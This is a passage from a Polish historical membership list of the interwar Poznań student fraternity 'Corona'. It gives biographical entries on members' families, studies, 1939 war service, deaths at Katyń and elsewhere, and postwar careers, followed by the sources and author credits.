 102. Henryk Roguski, (2 marca 1903 w Przeuszynie w pow. opatowskim - 1940 w Katyniu) herbu Ostoja, s. Eugeniusza i Bogumiły Marii z Piotrowskich, przyrodni brat Stanisława (Sarmatia), absolwent Gimnazjum im. Tadeusza Rejtana 1922, student i absolwent rolnictwa UP, ziemianin, absolwent Szkoły Podchorążych Rezerwy Kawalerii w Grudziądzu 1928, ppor. rez., przydzielony do 10 Pułku Strzelców Konnych, w wojnie obronnej 1939 w 20 Pułku Ułanów, wzięty do niewoli przez Sowietów we Lwowie, w niewoli w Kozielsku, zamordowany przez NKWD
 103. Jerzy Rolbiecki, sekretarz sem. let. 1926/27, olderman sem. zim. 1927/28, redaktor miesięcznika “Awangarda”
 104. Bartłomiej Jordan-Rozwadowski, (7 maja 1904 - 1940 w Rosji) herbu Trąby, s. Wincentego i Izabeli Skarbek-Kruszewskiej, brat Tadeusza (prawd. Corona), student i absolwent (inż. rolnik) Wydziału Rolno-Leśnego UP, prezes sem. let. 1925/26 oraz sem. zim. 1926/27, aresztowany w 1940 przez NKWD zaginął bez wieści
 105. Tadeusz Rozwadowski, sekretarz PKM-u 1930 [być może Tadeusz Jordan-Rozwadowski (21 kwietnia 1906 - 15 kwietnia 1982), herbu Trąby, s. Wincentego i Izabeli Skarbek-Kruszewskiej, brat Bartłomieja (Corona)]

  Michał Rudowski, 1939 r.

 106. Michał Rudowski, (10 października 1913 w Klonówce pow. Starogard - 21 sierpnia 1993 w Gdyni) z Rumoki, herbu Prus (II Wilczekosy), s. Wacława i Janiny Eugenii ze Stryjewskich (h. Tarnawa), brat stryjeczny Jerzego i Zygmunta (obaj Sarmatia), brat stryjeczny Józefa, Leonarda i Szymona (wszyscy Sarmatia), brat stryjeczny Stanisława (Jagiellonia), brat stryjeczny Jana i Zygmunta (Helania), brat stryjeczny Jana (Praetoria), student i absolwent 1939 rolnictwa Wydziału Rolno-Leśnego UP, c. 1933, prezes 1936/37, wiceprezes 1937-39, członek Koła Rolników i Związku Łowieckiego, oficer rez. 2 Pułku Szwoleżerów Rokitniańskich, w wojnie obronnej 1939 dowódca trzech plutonów ckm, w niewoli niemieckiej, z której uciekł w końcu września 1939, w czasie okupacji w AK, po wojnie m.in. dyrektor Państwowych Gospodarstw Rolnych, zwolniony za odmowę wstąpienia do partii, później pracował jako zootechnik, a od 1953 w hodowli koni, m.in. rejonowy inspektor hodowli koni, sprawując pieczę nad licznymi stadninami, w tym nad ośmioma stadninami pełnej krwi angielskiej, krajowy i międzynarodowy sędzia jeździecki wszystkich konkurencji, autor ponad 2000 fotografii koni polskich, w tym 700 publikowanych, odznaczony m.in. Złotą Honorową Polska Odznaką Jeździecką, Krzyżem Kawalerskim OOP, złotymi honorowymi odznakami Polskiego Związku Hodowców Koni i Ludowych Zespołów Sportowych, pośmiertnie Krzyżem AK

  [Źródła (poza wskazanymi poniżej spisu członków): Słownik Biograficzny Pomorza Nadwiślańskiego, t. 4, Gdańsk 1997; Ziemianie Polscy XX wieku, cz. 5, Warszawa 2000]

 107. Karol Ruszczyński, (26 października 1882 w Łabiszynie na Kujawach - 1940 w Katyniu) z Bytynia, s. Józefa i Heleny z Grąbczewskich, brat Adama (Magna-Polonia), stryj Stefana (Corona), absolwent Gimnazjum w Bydgoszczym oraz rolnictwa UWr., członek Sejmiku i Wydziału Powiatowego w Inowrocławiu, prezes Rady Nadzorczej cukrowni “Wierzchosławice”, ziemianin, dzierżawca maj. Ścibrze-Topola k. Inowrocławia oraz właściciel maj. Jeżówka pow. Sochaczew w woj. warszawskim, prezes Związku Ziemian w pow. inowrocławskim, odznaczony Złotym Krzyżem Zasługi, Filister kooptowany (honorowy ?) Corony, we wrześniu 1939 ewakuował się z rodziną na Wołyń, gdzie w maj. Stadniki pod Równem został aresztowany przez NKWD, osadzony w więzieniu w Ostrorogu, a następnie w Szepietówce, w niewoli sowieckiej w Starobielsku i Kozielsku, zamordowany przez NKWD
 108. Stefan Józef Zygmunt Ruszczyński, (17 sierpnia 1914 w Lesznie - 1940 w Charkowie) s. Adama (Magna-Polonia) i Janiny z Majewskich, bratanek Karola (Corona), absolwent Gimnazjum im. Karola Marcinkowskiego w Poznaniu 1932, student prawa UP, sekretarz 1936-1938, absolwent Szkoły Podchorążych Rezerwy Kawalerii w Grudziądzu 1933, ppor. rez., przydzielony do Ośrodka Zapasowego Wielkopolskiej Brygady Kawalerii w Armii Poznań, w niewoli sowieckiej, zamordowany przez NKWD
 109. Jan Klemens Schütz, (23 listopada 1907 w Krakowie - 1983 w Poznaniu) herbu Strzelec, s. Adolfa i Zofii z Wielowieyskich, stryj Przemysława (Sparta), student i absolwent 1933/34 Wydziału Rolno-Leśnego UP, właściciel ziemski klucza Biała Woda k. Lelowa pow. Włoszczowa oraz maj. Suserz pow. Gąbin w woj. mazowieckim, w czasie okupacji w AK w oddziałach “Marcin” i “Ludwik”, w 1950 aresztowany i więziony przez UB, skazany na więzienie, więziony przy ul. Młyńskiej w Poznaniu i więzieniu we Wronkach

  Michał Sczaniecki, ok. 1930 r. (?).

 110. Michał Sczaniecki, (26 marca 1910 w Łaszczynie k. Rawicza - 29 maja 1977 w Warszawie) s. Władysława i Jadwigi z Plucińskich, brat Andrzeja (Helania), kuzyn Tadeusza (Corona), absolwent Gimnazjum Marii Magdaleny w Poznaniu 1927, student prawa i historii UP 1927-30 i UJ 1930-32, sekretarz 1929/30, prezes 1930, doktorat UP 1937 (”Nadanie ziemi na rzecz rycerzy w Polsce do końca XIII wieku”, jako por.rez. artylerii zgłosił się do Armii Polskiej we Francji, w 1939 przygotowywał polski obóz szkoleniowy dla podchorążych w Coetquidan, uczestniczył w obronie linii Maginota w szeregach I Dywizji Grenadierów; w czasie walk w Lotaryngii ranny, za kampanię francuską 1940 odznaczony dwukrotnie Krzyżem Walecznych i francuskim Croix de Guerre, w niewoli niemieckiej, m.in. w oflagu niemieckim w Edelbach 1940-45, po wyzwoleniu wyjechał do Francji, w 1946 wrócił do kraju, wykładowca UP, prof. nadzw. 1954, prof. zw. 1959, kierownik Katedry Powszechnej Historii Państwa i Prawa UP/UAM 1955-65, prezes poznańskiego oddziału Towarzystwa Rozwoju Ziem Zachodnich, wicedyrektor, a nstępnie dyrektor 1961-64 Instytutu Zachodniego, zmuszony do rezygnacji ze stanowiska przez władze komunistyczne, od 1965 prof. UW, doktor honoris causa Uniwersytetu w Grenoble, pochowany na Starych Powązkach w Warszawie

  Tadeusz Sczaniecki, 1939 r.

 111. Tadeusz Sczaniecki, (26 maja 1917 w Nawrze k. Torunia - 27 października 1998 w Tyńcu) s. Jana i Ireny z Cichowskich, kuzyn Andrzeja (Helania) i Michała (Corona), absolwent Gimnazjum im Adama Mickiewicza w Poznaniu 1935, służba wojskowa w Szkole Podchorążych Kawalerii w Grudziądzu, student prawa UP, wiceprezes sem. zim. i sem. let. 1938/39, uczestnik wojny obronnej 1939, w 1943 wstąpił do Zakonu Benedyktynów w Tyńcu i tam otrzymał imię Paweł, dr teologii, autor szeregu prac na temat liturgii i historii Benedyktynów

  Zbigniew Sęp-Szarzyński.

 112. Zbigniew Sęp-Szarzyński, (26 lutego 1902 w Szymanowicach - 15 stycznia 1924 w Komorzu w pow. jarocińskim) herbu Junosza, s. Michała i Heleny z d. Szołdrska, student rolnictwa UP, działacz Młodzieży Monarchistycznej, wiceprezes Corony, zginął śmiercią tragiczną (samobójstwo), pochowany w Iwanowicach k. Szczytnik w Kaliskiem

 113. Kazimierz Siciński, z Antonin [być może Kazimierz Siciński (ok. 1900 - ) , herbu Prawdzic, s. Macieja i Teodory z d. Echaust]

  Andrzej Kirn-Słaboszewicz, 1939 r.

 114. Andrzej Kirn-Słaboszewicz, (ok. 1913 - ) brat Oskara (Regia), student Wydziału Prawno-Ekonomicznego UP, dwukrotnie sekretarz, dwukrotnie olderman, w tym 1937/38, dwukrotnie prezes, w tym sem. zim. 1938/39, uczestnik wojny obronnej 1939, w niewoli niemieckiej, po wojnie na emigracji w Argentynie i Stanach Zjednoczonych, pracownik linii lotniczych Pan American

 115. Juliusz Sobański, [prawd. Juliusz Sobański (25 lutego 1909 w Świdowej - 31 sierpnia 1979 w Zielonej Górze), herbu Junosza, s. Sobiesława i Gabrieli z d. Grabianka]

  Zdzisław Sojecki, 1939 r.

 116. Zdzisław Sojecki,

 117. Henryk Stojowski, (4 lutego 1910 - 1939) s. Stefana i Ludwiki z Gostkowskich, wiceprezes sem. let. 1930/31, inż. rolnik UP, por. artylerii, poległ w kampanii wrześniowej
 118. Kornel Sulimierski, (1904-1977) herbu Starykoń, s. Jana i Jadwigi z Grodzickich, brat Zygmunta (Sarmatia), wiceprezes 1925
 119. Witold Szcześniewski, (17 lipca 1905 w Kole - 14 września 1944 w Warszawie) s. Kazimierza i Zofii z Tabaczyńskich, student i absolwent (inż. rolnik) Wydziału Rolno-Leśnego UP, sekretarz sem. zim. 1924/25, wiceprezes sem. let. 1925/26 oraz sem. let. 1926/27, rotmistrz w 15 Pułku Ułanów Poznańskich, ciężko ranny w kampanii wrześniowej, żołnierz AK, poległ na ul. Skorupki w powstaniu warszawskim w Zgrupowaniu “Harnaś”, zginął przy ul. Hożej 8, pochowany na warszawskich Powązkach
 120. Mieczysław Zygmunt Szułdrzyński, (28 grudnia 1905 w Lubaszu w pow. czarnkowskim - 1940 w Charkowie) s. Mieczysława i Janiny z Szembeków, student i absolwent prawa UP 1931, olderman sem. zim. 1929/30 oraz sem. let. 1930/31, dzierżawaca maj. Lubasz pow. Czarnków w woj. poznańskim, absolwent Szkoły Podchorążych Rezerwy Kawalerii 1928, ppor. rez. kawalerii, przydzielony do 15 Pułku Ułanów Poznańskich, wzięty do niewoli sowieckiej we Lwowie, w niewoli w obozie w Starobielsku, zamordowany przez NKWD
 121. Kazimierz Ślaski, (21 listopada 1912 w maj. Orłów - 14 czerwca 1990 w Poznaniu) s. Jerzego, student Wydziału Prawno-Ekonomicznego UP, wiceprezes 1936/37, prezes 1937/38, historyk, badacz dziejów Pomorza, dr UP, pracownik Instytutu Zachodniego, Wojewódzkiego Archiwum Państwowego w Poznaniu, Archiwum PAN w Poznaniu, a od 1969 Instytutu Historii PAN
 122. Włodzimierz Świderski,
 123. Jerzy Tabaczyński,

  Jan Kazimierz Tarnowski, lata 30-te.

 124. Jan Kazimierz Tarnowski, (1911 w Toruniu - 1998 w Montevideo) s. Kazimierza i Zofii z d. Urbańska, absolwent Gimnazjum Klasycznego im. Mikołaja Kopernika w Toruniu 1928, student i absolwent prawa UP 1928-32, sekretarz Młodzieży Wszechpolskiej 1930/31, przewodniczący Sądu Koleżeńskiego BPSUP 1934/35 oraz Koła Prawników i Ekonomistów 1935/36, absolwent Szkoły Podchorążych Rezerwy Artylerii we Włodzimierzu Wołyńskim 19333, oficer rez., działacz ONR, dr praw (?), publicysta, po wojnie w Urugwaju

 125. Leon Taylor, (17 stycznia 1913 w Krakowie - 3 października 2000 w Poznaniu) s. Edwarda (ekonomisty, prof. UP, Baltia) i Wandy z d. Wybranowska, absolwent Gimnazjum im. Karola Marcinkowskiego w Poznaniu 1930, student i absolwent 1935 prawa UP, c. 1931, prezes 1933/34, prezes Koła Prawników i Ekonomistów 1934/35, działacz Młodzieży Wszechpolskiej i Obozu Wielkiej Polski, dr praw UP, oficer rez., w wojnie obronnej 1939 w 7 Pułku Strzelców Konnych Wielkopolskich Wielkopolskiej Brygady Kawalerii w ramach Armii “Poznań”, m.in. uczestnik bitwy nad Bzurą oraz obrony Warszawy, odznaczony Krzyżem Walecznych, w niewoli niemieckiej w obozie w Woldenbergu 1939-45, asystent na Wydziale Prawno-Ekonomicznym UP, represjonowany po wojnie, adwokat, członek Naczelnej Rady Adwokackiej 1986-92, sędzia Trybunału Stanu, członek Zarządu Stowarzyszenia Filistrów Poznańskich Korporacji Akademickich 1991-1994
 126. Trawiński, wiceprezes 1923
 127. Witold Trąmpczyński, (22 października 1909 - 18 lutego 1982 w Warszawie) s. Wojciecha, brat Bogdana (Primislavia), absolwent Gimnazjum Męskiego w Ostrowie Wlkp., student i absolwent ekonomii UP, doc. UP, prof. ekonomii politycznej UJ i SGPiS, kierownik Katedry, a następnie Instytutu Międzynarodowych Stosunków Gospodarczych SGPiS, naczelny dyrektor 1945-50 i prezes 1950-55 NBP, czołowy działacz PZPR, m.in. minister handlu zagranicznego 1956-68, zastępca członka KC PZPR 1964-71, poseł na Sejm PRL V kadencji 1969-72, ambasador Polski w Waszyngtonie 1971-78, doctor honoris causa UAM

  Tadeusz Trzciński, lata 30-te.

 128. Tadeusz Edward Trzciński (Prandota-Trzciński), (11 grudnia 1912 w miejsc. Gocanówko - 3 stycznia 2002 w Namur w Belgii) herbu Rawicz, s. Edwarda i Jadwigi z Ostrowskich, absolwent Gimnazjum w Inowrocławiu, student i absolwent 1937 rolnictwa UP, prezes Koła Rolników 1936, po studiach pracował zawodowo w Wielkopolsce i na Kujawach, w 1939 kupił maj. Dzierżysław w Konińskim, ppor. rez., w wojnie obronnej 1939 dowódca II plutonu w szwadronie ckm 16. Pułku Ułanów Wielkopolskich w Pomorskiej Brygadzie Kawalerii w ramach Armii “Pomorze”, walczył na Pomorzu, w niewoli niemieckiej 1939-45, po wyzwoleniu w PSZ na Zachodzie, zdemobilizowany 1947, ukończył studia chemiku przemysłu rolnego w Belgii, osiadł w Gembloux, kierownik w stacji doświadczalnej sadownictwa, autor 50 prac naukowych, odznaczony belgijskimi odznaczeniami Chévalier de l’ Ordre de Leopold II i Médaille de Réconaissance de la Ligue des Familles, pochowany w grobowcu rodzinnym w Gembloux w Belgii

  Jerzy Turno, 1939 r.

 129. Jerzy Turno

 130. Stefan Turno,
 131. Jan Ułaszyn,

  Stanisław Lubomirski, 1939 r.

 132. Piotr Unrug, (1918-2004) s. Wiktora i Marii von Kaganeck, c. 1938, student Uniwersytetu Fryderyka Wilhelma w Berlinie, dypl. rolnik, po wojnie na emigracji na Malcie, redaktor BBC Monitoring Service

 133. Walicki,

  Andrzej Wańkowicz, 1939 r.

 134. Andrzej Wańkowicz, (1920-2002) z Goryczek k. Kościana Wlkp., herbu Lis, s. Stanisława (Arkonia) i Aleksandry z d. Horwatt, wnuk Edwarda Horwatta (Arkonia), brat Karola (Corona), po wojnie na emigracji w Stanach Zjednoczonych

 135. Karol (?) Wańkowicz, (1916 - 25 lutego 1938 w Warszawie) z Goryczek k. Kościana Wlkp., herbu Lis, s. Stanisława (Arkonia) i Aleksandry z d. Horwatt, wnuk Edwarda Horwatta (Arkonia), brat Anrzeja (Corona), student SGH, zginął śmiercią tragiczną (samobójstwo z powodu nieszczęśliwej miłości)
 136. Jan Wichliński, [prawd. Jan Sas Wichliński (19 sierpnia 1908 w Helenowie w pow. inowrocławskim - 1939) herbu Zabawa, s. Włodzimierza i Zofii z Ostrowskich, brat stryjeczny Stanisława (Corona), w 1938 wybrany na posła z ramienia BBWR z okręgu inowrocławskiego, zamordowany w 1939 (różne wersje śmierci, m.in. że zginął w obozie koncentracyjnym w Mauthausen bądź w Gniewkowie)
 137. Stanisław Wichliński, (10 sierpnia 1912 w Tucznie - 23 października 1939 w Inowrocławiu) herbu Zabawa, s. Lucjana i Justyny z Prandota-Trzcińskich, brat stryjeczny Jana (prawd. Corona), sekretarz 1933/34, wiceprezes 1934, inż. rolnik, walczył w obronie Warszawy w kampanii wrześniowej 1939, po kapitulacji wraca do swego maj. Tuczno pow. Inowrocław, aresztowany przez Niemców 10 października 1939, osadzony w więzieniu w Inowrocławiu, zamordowany wraz z 55 innymi więźniami przez pijanych gestapowców w nocy 23/24 października 1939
 138. Roman Wilden,
 139. Andrzej Wilski, (6 grudnia 1908 - 23 stycznia 1997) herbu Półkozic, z maj. Wielgie, s. Stanisława i Ireny z Olszakowskich, ukończył V kurs w Szkole Podchorążych Rezerwy Artylerii we Włodzimierzu Wołyńskim 1930/31, a w lecie 1931 odbył praktykę w 7 Dywizjonie Artylerii Konnej w Poznaniu, ppor. rez. art. ze starszeństwem z 1 stycznia 1933 r., przypisany do 7 Dywizjonu Artylerii Konnej w Poznaniu, w sierpniu 1939 zmobilizowany do 11 Dywizjonu Artylerii Konnej w Bydgoszczy, gdzie został skierowany do Ośrodka Zapasoweog, później w składzie 5 baterii 1 Dywizjonu Artylerii Konnej jako dowódca 3 działonu, brał czynny udział w oboronie Warszawy, w czasie wojny w niemieckim oflagu, po wojnie pracował w Instytucie Ochrony Roślin w Poznaniu, prof. dr hab., nematolog i agronom, poinier polskiej nematologii rolnej, znawca systematyki nicieni - psaożytów grzybów i roślin wyżsyzch, autor wielu prac naukowych, pochowany na cmentarzu na Junikowie w Poznaniu (pole 4, rząd A)
  [Źródła (poza wskazanymi poniżej spisu członków): Paweł Janicki, www.7dak.pl, sierpień 2013]

 140. Konstanty Wysocki, [być może Konstanty Wysocki-Wyszkiewicz (1909-1975 w Londynie), herbu Godziemba, s. Henryk i Konstancji z Przewłockich, brat Stanisława (prawd. Corona)]
 141. Stanisław Wysocki, [być może Stanisław Wysocki-Wyszkiewicz (5 listopada 1908 w Krakowie - 1 lipca 1942 w Auschwitz), herbu Godziemba, s. Henryk i Konstancji z Przewłockich, brat Konstantego (prawd. Corona)]
 142. Zygmunt Wyszyński,
 143. Stanisław Załęski,
 144. Tomasz Załuski,
 145. Lech Zawadzki,
 146. Kazimierz Zdziarski, (1907 - styczeń 1971 w Caracas) herbu Gozdawa, s. Kazimierza i Kamilli z d. Arkuszewska, studiował prawo UP, wiceprezes 1929/30, sekretarz PKM 1930, działacz Katolickiej Młodzieży Narodowej, w służbie dyplomatycznej, po wojnie na emigracji Wielkiej Brytanii do 1954, a następnie w Wenezueli
 147. Jan Zdzitowiecki, (25 października 1897 - 24 maja 1975) prezes Młodzieży Wszechpolskiej 1924 w Lublinie, student Wydziału Prawno-Ekonomicznego UP, prezes sem. let. 1926/27, prezes Koła Poznańskiego Młodzieży Wszechpolskiej 1926/27, prezes władz naczelnych Związku Młodych Narodowców, ekonomista, prawnik, doktorat UP 1934, prof. UP/UAM i Wyższej Szkoły Ekonomicznej w Poznaniu, pochowany na Cmentarzu Junikowskim w Poznaniu
 148. Zdzisław Zdzitowiecki,
 149. Henryk Zielewicz, [być może Henryk Jan Zielewicz (1912 - ) s. Zygmunta i Wandy z Robińskich]
 150. Jan Zielewicz, wiceprezes Młodzieży Wszechpolskiej 1928/29 [być może Jan Zielewicz, s. Stefana i Katarzyny z d. Mauve]
 151. Roman Ziołecki, (1885-1980) s. Bolesława i Jadwigi z Janczakowskich, dr, dyrektor poznańskiego oddziału Banku Cukrownictwa, Filister kooptowany (honorowy ?) Corony, prezes Związku Seniorów 1939
 152. Józef Żychliński, (23 lutego 1872 w Gorazdowie k. Wrześni - 6 września 1941 w Warszawie) s. Stanisława i Anny z Wantoch-Rakowskich, ziemianin, właściciel Gorazdowa w pow. wrzesińskim, prezes Ziemstwa Kredytowego w Poznaniu oraz Banku Cukrownictwa w Poznaniu, jeden z najbogatszych polskich ziemian, Filister kooptowany (honorowy ?) Corony, pochowany na Cmentarzu w Sokolnikach

Pieczęć Corony, 1938 r.

Listę członków opracowano na podstawie:

1) Antoni Gościmski (opracowanie Daniel Pater), Lista członków Polskiej Korporacji Akademickiej Corona (Poznań), (w:) Polskie Korporacje Akademickie 1997, nr 14, s. 90 i n.,
2) materiałów archiwalnych z Archiwum Korporacyjnego,
3) wydawnictw encyklopedycznych i biograficznych oraz rozmów z rodzinami członków Korporacji Corona.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 5 X 2010 r.
Ostatnia zmiana: 26 I 2021 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Korporacja Studentów Uniwersytetu Poznańskiego “Corona”, (na:) www.archiwumkorporacyjne.pl, stan 26 I 2021 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }